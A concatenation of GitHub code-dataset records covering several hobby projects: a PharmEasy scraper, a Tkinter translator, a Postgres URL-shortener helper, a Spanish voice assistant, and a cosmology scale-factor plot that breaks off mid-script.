"LinkerApplication/cv-generator", "sub_path": "backend/generator/profile/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2546, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "rest_framework.mixins.CreateModelMixin", "line_number": 13, "usage_type": "attribute"}, {"api_name": "rest_framework.mixins", "line_number": 13, "usage_type": "name"}, {"api_name": "rest_framework.mixins.RetrieveModelMixin", "line_number": 14, "usage_type": "attribute"}, {"api_name": "rest_framework.mixins", "line_number": 14, "usage_type": "name"}, {"api_name": "rest_framework.mixins.UpdateModelMixin", "line_number": 15, "usage_type": "attribute"}, {"api_name": "rest_framework.mixins", "line_number": 15, "usage_type": "name"}, {"api_name": "rest_framework.mixins.DestroyModelMixin", "line_number": 16, "usage_type": "attribute"}, {"api_name": "rest_framework.mixins", "line_number": 16, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.GenericViewSet", "line_number": 17, "usage_type": "name"}, {"api_name": "models.Profile.objects.all", "line_number": 25, "usage_type": "call"}, {"api_name": "models.Profile.objects", "line_number": 25, "usage_type": "attribute"}, {"api_name": "models.Profile", "line_number": 25, "usage_type": "name"}, {"api_name": "serializers.ProfileSerializer", "line_number": 26, "usage_type": "name"}, {"api_name": "rest_framework.permissions.IsAuthenticatedOrReadOnly", "line_number": 27, "usage_type": "name"}, {"api_name": "permissions.IsProfileOwnerPermission", "line_number": 27, "usage_type": "name"}, {"api_name": "services.check_user_has_profile", "line_number": 30, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 31, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 32, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 32, "usage_type": "name"}, {"api_name": "rest_framework.mixins.CreateModelMixin", "line_number": 42, "usage_type": "attribute"}, {"api_name": "rest_framework.mixins", "line_number": 42, "usage_type": "name"}, {"api_name": "rest_framework.mixins.RetrieveModelMixin", "line_number": 43, "usage_type": "attribute"}, {"api_name": "rest_framework.mixins", "line_number": 43, "usage_type": "name"}, {"api_name": "rest_framework.mixins.UpdateModelMixin", "line_number": 44, "usage_type": "attribute"}, {"api_name": "rest_framework.mixins", "line_number": 44, "usage_type": "name"}, {"api_name": "rest_framework.mixins.DestroyModelMixin", "line_number": 45, "usage_type": "attribute"}, {"api_name": "rest_framework.mixins", "line_number": 45, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.GenericViewSet", "line_number": 46, "usage_type": "name"}, {"api_name": "models.Experience.objects.all", "line_number": 55, "usage_type": "call"}, {"api_name": "models.Experience.objects", "line_number": 55, "usage_type": "attribute"}, {"api_name": "models.Experience", "line_number": 55, "usage_type": "name"}, {"api_name": "serializers.ExperienceSerializer", "line_number": 56, "usage_type": "name"}, {"api_name": "rest_framework.permissions.IsAuthenticatedOrReadOnly", "line_number": 57, "usage_type": "name"}, {"api_name": "permissions.HasProfileAndIsOwnerPermission", "line_number": 57, "usage_type": "name"}, {"api_name": "services.get_user_profile", "line_number": 60, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 62, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 63, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 63, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 69, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_201_CREATED", "line_number": 69, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 69, "usage_type": "name"}]} +{"seq_id": "18901630694", "text": "import openpyxl\n\n\nclass HomePageData:\n test_HomePage_data = [{\"firstname\": \"Lucija\", \"email\": \"mail@example.com\", \"gender\": \"Female\"},\n {\"firstname\": \"Jens\", \"email\": \"mail2@example.com\", \"gender\": \"Male\"}]\n\n @staticmethod\n def getTestData(test_case_name):\n\n book = openpyxl.load_workbook(\"C:\\\\Users\\\\lucij\\\\Documents\\\\PythonDemo.xlsx\")\n sheet = book.active\n dictionary = {}\n\n for i in range(1, sheet.max_row + 1):\n if sheet.cell(row=i, column=1).value == \"Testcase2\":\n for j in range(2, sheet.max_column + 1):\n dictionary[sheet.cell(row=1, column=j).value] = sheet.cell(row=i, column=j).value\n\n return [dictionary]\n", "repo_name": "lucijacovic/selenium", "sub_path": "testData/HomePageData.py", "file_name": "HomePageData.py", "file_ext": "py", "file_size_in_byte": 730, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "openpyxl.load_workbook", "line_number": 11, "usage_type": "call"}]} +{"seq_id": "35414158039", "text": "import json\nfrom rdkit import Chem\nimport pandas as pd\n\n\n\n\ndef reactant_product_pair():\n file=open('Knowledge Base for Metabolites\\MetXBioDB-1-0.json',encoding='utf8')\n reactants=[]\n reaction_product_pairs=[]\n data=json.load(file,encoding='utf8') \n for i in data['biotransformations']:\n entry_rp={}\n entry_rp['Substrate_Name']=data['biotransformations'][i]['Substrate']['Name']\n substrate_mol=Chem.inchi.MolFromInchi(str(data['biotransformations'][i]['Substrate']['InChI']))\n entry_rp['SubstrateMolecule']=substrate_mol\n entry_rp['METXBIODB_ID']=str(data['biotransformations'][i]['Substrate']['METXBIODB_ID'])\n entry_rp['Enzymes']=list(str(data['biotransformations'][i]['Enzyme(s)']).split(\";\"))\n entry_rp['BioTransformer_type']=data['biotransformations'][i]['Biotransformation type']\n entry_rp['BioSystem']=data['biotransformations'][i]['Biosystem']\n \n for x in data['biotransformations'][i]['Products']:\n products=[]\n entry_product={}\n entry_product['Product_Name']=x.get('Name')\n prodcut_mol=Chem.inchi.MolFromInchi(str(x.get('InChI')))\n entry_product['Product_Molecule']=prodcut_mol\n products.append(entry_product)\n \n \n entry_rp['Products']=products \n rc={}\n for j in entry_rp.keys():\n if j!='Products':\n rc[str(j)]=entry_rp[str(j)]\n \n \n reaction_product_pairs.append(entry_rp) \n reactants.append(rc)\n return reactants\n \n \ndef Extract_MetX_from_Ref():\n file=open('Knowledge Base for Metabolites\\metaboliteprediction_referencedataset.json',encoding='utf8')\n data=json.load(file,encoding='utf8')\n p_mol=0\n met_mol=0\n\n for x in data:\n \n a=len(x['Metabolites'])\n met_mol+=a\n \n\n \n", "repo_name": "AbhinavTalari/BayesLabs-Internship", "sub_path": "reference_data.py", "file_name": "reference_data.py", "file_ext": "py", "file_size_in_byte": 1858, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "json.load", "line_number": 12, "usage_type": "call"}, {"api_name": "rdkit.Chem.inchi.MolFromInchi", "line_number": 16, "usage_type": "call"}, {"api_name": "rdkit.Chem.inchi", "line_number": 16, "usage_type": "attribute"}, {"api_name": "rdkit.Chem", "line_number": 16, "usage_type": "name"}, {"api_name": "rdkit.Chem.inchi.MolFromInchi", "line_number": 27, "usage_type": "call"}, {"api_name": "rdkit.Chem.inchi", "line_number": 27, "usage_type": "attribute"}, {"api_name": "rdkit.Chem", "line_number": 27, "usage_type": "name"}, {"api_name": "json.load", "line_number": 46, "usage_type": "call"}]} +{"seq_id": "11965664761", "text": "from bs4 import BeautifulSoup\r\nimport requests\r\n\r\ndef check_use(drug_name):\r\n output = {}\r\n page = f'https://pharmeasy.in/search/all?name={drug_name}'\r\n\r\n source=requests.get(page)\r\n soup=BeautifulSoup(source.text,'html')\r\n body = soup.body.findAll ('a' ,{'class':'ProductCard_medicineUnitWrapper__238qP ProductCard_defaultWrapper__3htqi'})\r\n\r\n source = requests.get('https://pharmeasy.in/'+str(body[0]).split('\"')[3])\r\n soup=BeautifulSoup(source.text,'html')\r\n \r\n body = soup.body.findAll ('td' ,{'class':'DescriptionTable_field__1aXTD'})\r\n body1 = soup.body.findAll ('td' ,{'class':'DescriptionTable_value__1afug'})\r\n body2 = soup.body.findAll ('div' ,{'class':'Section_section__QOSbs'})\r\n\r\n if len(body2) ==0: return \"Sorry we couldn\\'t find the use cases \"\r\n \r\n for i in zip(body ,body1): output[str((i[0])).split('>')[1].split('<')[0]] = str((i[1])).split('>')[1].split('<')[0]\r\n \r\n try :\r\n output['Side effects'] = output[''] \r\n del(output[''] )\r\n \r\n except KeyError:\r\n pass\r\n \r\n return output\r\n \r\n", "repo_name": "sukeshan/Identifying-the-purpose-of-the-tablet", "sub_path": "scraper.py", "file_name": "scraper.py", "file_ext": "py", "file_size_in_byte": 1096, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "requests.get", "line_number": 8, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 9, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 12, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 13, "usage_type": "call"}]} +{"seq_id": "38356644129", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Nov 4 10:32:44 2023\n\n@author: DIGITS\n\"\"\"\n\nfrom tkinter import *\nfrom tkinter import ttk\nfrom googletrans import Translator, LANGUAGES\n\n# from google_trans_new import google_translator \n# translator = google_translator() \n# translate_text = translator.translate('hello world',lang_src='en',lang_tgt='zh',pronounce=True) \n# print(translate_text)\n\nroot = Tk()\nroot.geometry(\"1100x320\")\nroot.resizable(0,0)\n#root.iconbitmap['.ico']\nroot['bg'] = 'lightgreen'\n\nroot.title('Language Translator App')\nLabel(root, text=\"Language Translator\", font=\"Arial 20 bold\", bg=\"skyblue\").pack()\n\nLabel(root, text=\"Enter Text\", font=\"arial 13 bold\", bg=\"White\").place(x=165, y=90)\n\nInput_text = Entry(root, width=60)\nInput_text.place(x=30, y=130)\nInput_text.get()\n\nLabel(root, text=\"Output\", font=\"Arial 13 bold\", bg=\"White\").place(x=780, y=90)\nOutput_text = Text(root, font=\"arial 10\", height=5, wrap= WORD, padx=5, pady=5, width=50)\nOutput_text.place(x=600, y=130)\n\nlanguages = list(LANGUAGES.values())\n\ndest_lang = ttk.Combobox(root, values=languages, width=22)\ndest_lang.place(x=130, y=180)\ndest_lang.set(\"choose language\")\n\ndef Translate():\n translator = Translator()\n translated = translator.translate(text=Input_text.get(), dest=dest_lang.get())\n Output_text.delete(1.0, END)\n Output_text.insert(END, translated.text)\n \ntrans_btn = Button(root, text=\"Translate\", font=\"arial 17 bold\", pady=5, command= Translate, bg=\"skyblue\", activebackground=\"green\")\ntrans_btn.place(x=445, y=180) \n \nroot.mainloop()\n", "repo_name": "Digital-101/Language-Translation", "sub_path": "LanguageTranslator.py", "file_name": "LanguageTranslator.py", "file_ext": "py", "file_size_in_byte": 1553, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "googletrans.LANGUAGES.values", "line_number": 36, "usage_type": "call"}, {"api_name": "googletrans.LANGUAGES", "line_number": 36, "usage_type": "name"}, {"api_name": "tkinter.ttk.Combobox", "line_number": 38, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 38, "usage_type": "name"}, {"api_name": "googletrans.Translator", "line_number": 43, "usage_type": "call"}]} +{"seq_id": "43280724094", "text": "import psycopg2\nimport urllib.parse as up\nimport re\nimport os\nfrom dotenv import load_dotenv\n\nAPP_ROOT = os.path.join(os.path.dirname(__file__), '.')\ndotenv_path = os.path.join(APP_ROOT, '.env')\nload_dotenv(dotenv_path)\n\ndb_url = os.getenv('DATABASE_URL')\n\nup.uses_netloc.append(\"postgres\")\nurl = up.urlparse(db_url)\n\n\ndef create_connection():\n '''\n create connection to database instance\n '''\n connection = psycopg2.connect(database=url.path[1:],\n user=url.username,\n password=url.password,\n host=url.hostname,\n port=url.port\n )\n\n try:\n create_table_query = '''CREATE TABLE tits(\n tinyurl TEXT,\n link TEXT\n )\n '''\n cursor = connection.cursor()\n # cursor.execute(create_table_query)\n connection.commit()\n print(cursor)\n except Exception as error:\n print(\"couldn't create table\")\n print(error)\n\n print('connection to database successfull')\n\n\ndef drop_table():\n connection = psycopg2.connect(database=url.path[1:],\n user=url.username,\n password=url.password,\n host=url.hostname,\n port=url.port\n )\n\n cursor = connection.cursor()\n drop_table_query = '''DROP TABLE tits CASCADE;'''\n cursor.execute(drop_table_query)\n connection.commit()\n print('table dropped successfully')\n\n\ndef save_if_not_exist(key, value):\n '''Save tinyurl and link in database if tinyurl doesn\\'t exist'''\n data = get_link(key)\n if data:\n return False\n\n save_link(key, value)\n return True\n\n\ndef save_link(tinyurl, link):\n try:\n connection = psycopg2.connect(database=url.path[1:],\n user=url.username,\n password=url.password,\n host=url.hostname,\n port=url.port\n )\n\n cursor = connection.cursor()\n postgres_insert_query = \"\"\" INSERT INTO tits (tinyurl, link) VALUES (%s, %s)\"\"\"\n\n record_to_insert = (tinyurl, link)\n print(record_to_insert)\n cursor.execute(postgres_insert_query, record_to_insert)\n\n connection.commit()\n print('records inserted')\n except Exception as error:\n if(connection):\n print('failed to insert record to db', error)\n\n\ndef get_link(filter=None):\n '''\n Retrieve link associated with tinyurl in the database\n '''\n\n try:\n connection = psycopg2.connect(database=url.path[1:],\n user=url.username,\n password=url.password,\n host=url.hostname,\n port=url.port\n )\n cursor = connection.cursor()\n postgreSQL_select_Query = \"\"\"\n SELECT *\n FROM tits\n \"\"\"\n params = []\n if filter is not None:\n postgreSQL_select_Query += \"WHERE position(%s in tinyurl) > 0\"\n params.append(filter)\n cursor.execute(postgreSQL_select_Query, tuple(params))\n # print(\"Selecting rows from tips table using cursor.fetchall\")\n\n return cursor.fetchone()\n except Exception as error:\n print('failed to get record(s) from db', error)\n", "repo_name": "shadrach-tayo/Titsly", "sub_path": "db.py", "file_name": "db.py", "file_ext": "py", "file_size_in_byte": 3626, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.join", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path", "line_number": 7, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 8, "usage_type": "call"}, {"api_name": "os.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "dotenv.load_dotenv", "line_number": 9, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 11, "usage_type": "call"}, {"api_name": "urllib.parse.uses_netloc.append", "line_number": 13, "usage_type": "call"}, {"api_name": "urllib.parse.uses_netloc", "line_number": 13, "usage_type": "attribute"}, {"api_name": "urllib.parse", "line_number": 13, "usage_type": "name"}, {"api_name": "urllib.parse.urlparse", "line_number": 14, "usage_type": "call"}, {"api_name": "urllib.parse", "line_number": 14, "usage_type": "name"}, {"api_name": "psycopg2.connect", "line_number": 21, "usage_type": "call"}, {"api_name": "psycopg2.connect", "line_number": 46, "usage_type": "call"}, {"api_name": "psycopg2.connect", "line_number": 72, "usage_type": "call"}, {"api_name": "psycopg2.connect", "line_number": 99, "usage_type": "call"}]} +{"seq_id": "32573773409", "text": "### Librerías a utilizar ########\n\nfrom bs4 import BeautifulSoup\nfrom time import time\nfrom googletrans import Translator\nfrom ctypes import cast, POINTER\nfrom comtypes import CLSCTX_ALL\nfrom pycaw.pycaw import AudioUtilities, IAudioEndpointVolume\nimport pandas as pd, subprocess as sub, AVMSpeechMath as sm, random, calendar, subprocess\nimport time, wikipedia, pyjokes, pywhatkit, AVMYT as yt, pyautogui, webbrowser, pyperclip, json, speech_recognition as sr, requests, pyttsx3, datetime\n\n### Nombre y comando del asistente ###\nname = 'alexa'\nlistener = sr.Recognizer()\nengine = pyttsx3.init('sapi5')\n\n# Voz y velocidad del asistente\nvoices = engine.getProperty('voices')\nengine.setProperty('voice', voices[0].id)\n\n#Imprimir que voces tiene tu compuatdor\n#for voice in voices:\n #print(voice)\n\nengine.setProperty('rate', 170)\n\n#Función para que el asistente hable\ndef talk(text):\n engine.say(text)\n engine.runAndWait()\n\n\n#Bucle para que el asistente simpre este activo\nwhile True:\n #Variable que guarda la hora actual\n hora = datetime.datetime.now().strftime('%I:%M %p') \n \n #Activar y Comprobar que el microfono funcione \n try:\n with sr.Microphone() as source:\n print( name + ' está escuchando...')\n audio = sr.Recognizer().listen(source, phrase_time_limit=5)\n rec = sr.Recognizer().recognize_google(audio, language='es-CO').lower()\n rec = rec.lower()\n\n #Muestra que escuchó el asistente\n print('Escuchó: ' + rec)\n\n# ============ Cómo está ========================== \n if name + ' cómo estás' in rec:\n answers = ['Estoy muy bien, gracias por preguntar', 'Estoy bien', 'Estoy bien, no me quejo']\n talk(random.choice(answers))\n \n# ============= Su nombre ========================== \n elif 'cómo te llamas' in rec or 'cuál es tu nombre' in rec:\n answers = [f'Mi nombre es {name}', f'Me llamo {name}', f'{name}']\n talk(random.choice(answers))\n\n# ============= Contar un poco de ella ========================== \n elif name + ' cuéntame de ti' in rec or name + ' háblame de ti' in rec:\n talk(f'Soy {name}, una asistente a voz, puedo entablar una pequeña conversación y hacer diferentes acciónes que me pidas')\n \n# ============= Contar chistes ========================== \n elif name + ' cuéntame un chiste' in rec or name + ' hazme reír' in rec:\n chiste = pyjokes.get_joke('es')\n talk(chiste) \n\n#============== Piedra, papel o tijera ==========================\n elif name + ' piedra papel o tijera' in rec:\n answers = ['Piedra', 'Papel', 'Tijera']\n talk(random.choice(answers))\n\n\n#============= Dice un color ============================\n elif name + ' dime un color' in rec:\n colors = ['Amarillo', 'Rojo', 'Verde', 'Azul', 'Blanco', 'Negro', 'Rosado', 'Morado', 'griss', 'Naranja']\n talk(random.choice(colors))\n\n#============= Dice un número =========================\n elif name + ' dime un número' in rec:\n if 'del' in rec or 'entre' in rec:\n rec = rec.replace(name + ' dime un número del', '')\n rec = rec.replace(name + ' dime un número entre', '')\n rec = rec.replace(name + ' dime un número entre el', '')\n rec = rec.replace(' y el', '')\n rec = rec.replace('el', '')\n rec = rec.replace('al', '')\n\n minnumber = int(rec.split()[0])\n maxnumber = int(rec.split()[1])\n\n talk(random.randint(minnumber, maxnumber))\n #Si usuario dice la cantidad de cifras\n elif 'de' in rec:\n rec = rec.replace('uno', '1')\n rec = rec.replace('dos', '2')\n rec = rec.replace('tres', '3')\n rec = rec.replace('cuatro', '4')\n rec = rec.replace('cinco', '5')\n \n digits=\"\".join(c for c in rec if c.isdecimal())\n digits = int(digits)\n\n minnumber = '1'\n maxnumber = '9'\n\n for cifras in range(1,digits):\n minnumber = minnumber + '0'\n maxnumber = maxnumber + '9'\n \n\n talk(random.randint(int(minnumber),int(maxnumber)))\n #Sino, te dice un número normal entre 1 y 9999\n else:\n talk(random.randint(1, 9999))\n\n\n#=========== Calcular operaciones matematicas ===============================\n elif name +' cuánto es' in rec:\n rec = rec.replace(name, '')\n rec = sm.getResult(rec)\n\n if 'Unable to evaluate equation' in rec:\n talk('No puedo hacer la operación matematica que me pides')\n else:\n talk(rec)\n\n#=========== Día actual ===============================\n elif name +' qué día es hoy' in rec:\n fecha = datetime.datetime.now()\n month = (int(datetime.datetime.strftime(fecha,'%m')) - 1)\n day = int(datetime.datetime.strftime(fecha, '%d'))\n day = str(day)\n months_year = ['Enero', 'Febreo', 'Marzo', 'Abril', 'Mayo', 'Junio', 'Julio', 'Agosto', 'Septiembre', 'Octubre', 'Noviembre', 'Diciembre']\n days_week = ['Lunes', 'Martes', 'Miercoles', 'Jueves', 'Viernes', 'Sabado', 'Domingo']\n day_week = int(datetime.datetime.today().weekday())\n\n talk('Hoy es' + days_week[day_week] + day + 'de' + months_year[month])\n \n\n#=========== Mes actual ===============================\n elif name +' qué mes estamos' in rec or name+' qué mes es hoy' in rec:\n fecha = datetime.datetime.now()\n month = (int(datetime.datetime.strftime(fecha,'%m')) - 1)\n months_year = ['Enero', 'Febreo', 'Marzo', 'Abril', 'Mayo', 'Junio', 'Julio', 'Agosto', 'Septiembre', 'Octubre', 'Noviembre', 'Diciembre']\n talk('Estamos en el mes de '+ months_year[month])\n\n#=========== Año actual ===============================\n elif name +' qué año estamos' in rec or name +' qué año es hoy' in rec:\n fecha = datetime.datetime.now()\n year = str(datetime.datetime.strftime(fecha,'%Y'))\n talk('Estamos en el año ' + year)\n\n#============== Calcula edad ========================\n elif name + ' qué edad tengo' in rec or name + ' calcula mi edad' in rec or name + ' puedes calcular mi edad' in rec:\n talk('Claro, por favor dime primero el día, mes y año de nacimiento')\n\n while True:\n try:\n with sr.Microphone() as source:\n print('Escuchando fecha de cumpleaños...')\n audio = sr.Recognizer().listen(source, phrase_time_limit=4)\n rec = sr.Recognizer().recognize_google(audio, language='es-CO').lower()\n rec = rec.lower()\n #======== Se remplazan las letras para solo dejar la fecha de cumpleaños =================\n rec = rec.replace('de', '')\n rec = rec.replace('l', '')\n rec = rec.replace('año', '')\n rec = rec.replace('día', '')\n rec = rec.replace('mes', '')\n\n day = rec.split()[0]\n month = rec.split()[1]\n year = rec.split()[2]\n\n months_year = {'enero':1, 'febrero':2, 'marzo':3, 'abril':4, 'mayo':5, 'junio':6, 'julio':7, 'agosto':8, 'septiembre':9, 'octubre':10, 'noviembre':11, 'diciembre':12}\n\n if month in months_year:\n \n month = months_year[month]\n\n day = int(day)\n month = int(month)\n year = int(year)\n \n try:\n\n fechaNow = datetime.datetime.now()\n monthNow = int(datetime.datetime.strftime(fechaNow,'%m'))\n yearNow = int(datetime.datetime.strftime(fechaNow,'%Y'))\n dayNow = int(datetime.datetime.strftime(fechaNow, '%d'))\n\n except:\n talk('No puedo calcular tu edad con el día o año solicitado')\n #===============Se hace el calculo para la edad con las fechas ==========\n yeardate = (year - yearNow) \n monthdate = (month - monthNow)\n daydate = (day - dayNow)\n \n daydate = str(daydate)\n monthdate = str(monthdate)\n yeardate = str(yeardate)\n #===============Se remplaza signo negativo si la resta es negativa ==========\n yeardate = yeardate.replace('-','')\n monthdate = monthdate.replace('-','')\n daydate = daydate.replace('-','')\n\n monthdate = int(monthdate)\n yeardate = int(yeardate)\n\n # list out keys and values separately\n key_list = list(months_year.keys())\n val_list = list(months_year.values())\n \n # print key with val month\n position = val_list.index(month)\n\n age = yeardate\n\n if month > monthNow:\n age = (age - 1)\n talk(f'Tienes {age} años de edad, faltan {monthdate} meses para tu cumpleaños') \n break\n \n elif month < monthNow: \n talk(f'Tienes {age} años de edad, tu cumpleaños fué el {day} de {key_list[position]}') \n break\n \n elif month == monthNow and day > dayNow:\n age = (age - 1)\n talk(f'Tienes {age} años de edad, faltan {daydate} días para tu cumpleaños')\n break\n\n elif month == monthNow and day < dayNow:\n talk(f'Tienes {age} años de edad, tu cumpleaños fue hace {daydate} días')\n break\n\n elif month == monthNow and day == dayNow:\n age\n talk(f'Tienes {age} años de edad, hoy es tu cumpleaños, felicidades')\n break\n\n else:\n talk('No puedo calcular la edad con el mes que me indicas, por favor vuelve a intertar')\n break\n\n except:\n pass\n\n#=== Finaliza el programa diciendo el nombre del asisten más alguna de estas dos palabras \"descansa o finalizar\"==========\n elif name + ' descansa' in rec or name + ' finalizar' in rec:\n break\n\n #=================== sino entiende lo que escucha =========================== \n elif name in rec:\n if len(name) == len(rec):\n answers = ['Hola', 'Dime', 'Sí, dime', 'En qué te puedo ayudar']\n talk(random.choice(answers))\n else:\n answers = ['No entiendo lo que me dices', 'No puedo responder a eso']\n talk(random.choice(answers))\n\n except:\n pass\n\n\n\n", "repo_name": "Dairo-Mazo/Asistente-Alexa", "sub_path": "Asistente_a_voz_Alexa.py", "file_name": "Asistente_a_voz_Alexa.py", "file_ext": "py", "file_size_in_byte": 12431, "program_lang": "python", "lang": "es", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "speech_recognition.Recognizer", "line_number": 14, "usage_type": "call"}, {"api_name": "pyttsx3.init", "line_number": 15, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 36, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 36, "usage_type": "attribute"}, {"api_name": "speech_recognition.Microphone", "line_number": 40, "usage_type": "call"}, {"api_name": "speech_recognition.Recognizer", "line_number": 42, "usage_type": "call"}, {"api_name": "speech_recognition.Recognizer", "line_number": 43, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 52, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 57, "usage_type": "call"}, {"api_name": "pyjokes.get_joke", "line_number": 65, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 71, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 77, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 92, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 112, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 115, "usage_type": "call"}, {"api_name": "AVMSpeechMath.getResult", "line_number": 121, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 130, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 130, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strftime", "line_number": 131, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 131, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strftime", "line_number": 132, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 132, "usage_type": "attribute"}, {"api_name": "datetime.datetime.today", "line_number": 136, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 136, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 143, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 143, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strftime", "line_number": 144, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 144, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 150, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 150, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strftime", "line_number": 151, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 151, "usage_type": "attribute"}, {"api_name": "speech_recognition.Microphone", "line_number": 160, "usage_type": "call"}, {"api_name": "speech_recognition.Recognizer", "line_number": 162, "usage_type": "call"}, {"api_name": "speech_recognition.Recognizer", "line_number": 163, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 188, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 188, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strftime", "line_number": 189, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 189, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strftime", "line_number": 190, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 190, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strftime", "line_number": 191, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 191, "usage_type": "attribute"}, {"api_name": "random.choice", "line_number": 258, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 261, "usage_type": "call"}]} +{"seq_id": "70144057765", "text": "import matplotlib.pyplot as plt\nimport numpy as np\n\n\ndef a(x, Omega0, h):\n \"\"\"\n Compute the scale factor for a matter-dominated universe. This\n is computed at the parameter x, which is related to time t by a parametric\n equation of sin or sinh depending on whether the universe is open or\n closed. For a flat universe, x = t.\n\n The function also returns the corresponding time t, given x.\n\n Note that h must be in inverse time units.\n x is a dimensionless (except in the flat case) parameter, with x >= 0.\n \"\"\"\n H0 = 100 * h\n if Omega0 == 1: # flat\n t = x\n a = (3 * H0 * t / 2) ** (2 / 3)\n else: # open or closed\n b = 1 / 2 * Omega0 / np.abs(1 - Omega0)\n t = 1 / H0 * b / np.sqrt(np.abs(1 - Omega0))\n if Omega0 > 1: # closed\n t *= x - np.sin(x)\n a = b * (1 - np.cos(x))\n else: # open\n t *= np.sinh(x) - x\n a = b * (np.cosh(x) - 1)\n return t, a\n\n\ndef t0(Omega0, h):\n \"\"\"\n Compute the age of a matter-dominated universe given Omega0 and h.\n The units of the age is inverse the units of H0.\n\n These equations were derived in PS2, question 1e.\n \"\"\"\n H0 = 100 * h\n if Omega0 == 1: # flat\n return 2 / (3 * H0)\n\n # in the closed or open case we need to find x0 first\n y = 1 + 2 * (1 - Omega0) / Omega0\n if Omega0 > 1: # closed\n x0 = np.arccos(y)\n else: # open\n x0 = np.arccosh(y)\n\n t0, a0 = a(x0, Omega0, h)\n assert np.isclose(a0, 1) # check that we indeed found the right t0\n return t0\n\n\nif __name__ == \"__main__\":\n HW_DIR = \"../ps2/\"\n h = 7.2e-4 # inverse Giga years\n\n # flat\n omega = 1\n t0_flat = t0(omega, h)\n x = np.linspace(0, 50 + t0_flat, num=100) # x = t, Gyrs\n t_flat, a_flat = a(x, omega, h)\n\n # closed\n omega = 3.0\n t0_closed = t0(omega, h)\n x = np.linspace(0, 2 * np.pi, num=100) # from Big Bang to Big Crunch\n t_closed, a_closed = a(x, omega, h)\n\n # open\n omega = 0.3\n t0_open = t0(omega, h)\n x = np.linspace(0, 3.8, num=100)\n t_open, a_open = a(x, 0.3, h)\n\n # shift time axis by subtracting t0 from t\n t_flat -= t0_flat\n t_closed -= t0_closed\n t_open -= t0_open\n\n plt.figure()\n plt.plot(t_flat, a_flat, label=\"$\\\\Omega_0 = 1$\")\n plt.plot(t_closed, a_closed, label=\"$\\\\Omega_0 = 3.0$\")\n plt.plot(t_open, a_open, label=\"$\\\\Omega_0 = 0.3$\")\n plt.scatter(-t0_flat, 0, c=\"red\", label=\"Big Bang\")\n plt.scatter(-t0_closed, 0, c=\"red\")\n plt.scatter(-t0_open, 0, c=\"red\")\n plt.scatter(\n (t_closed.max() - t0_closed) / 2,\n a_closed.max(),\n c=\"black\",\n label=\"Maximum Expansion\",\n )\n plt.scatter(t_closed.max(), 0, c=\"blue\", label=\"Big Crunch\")\n plt.legend()\n plt.xlabel(\"$t-t_0$ [Gyrs]\")\n 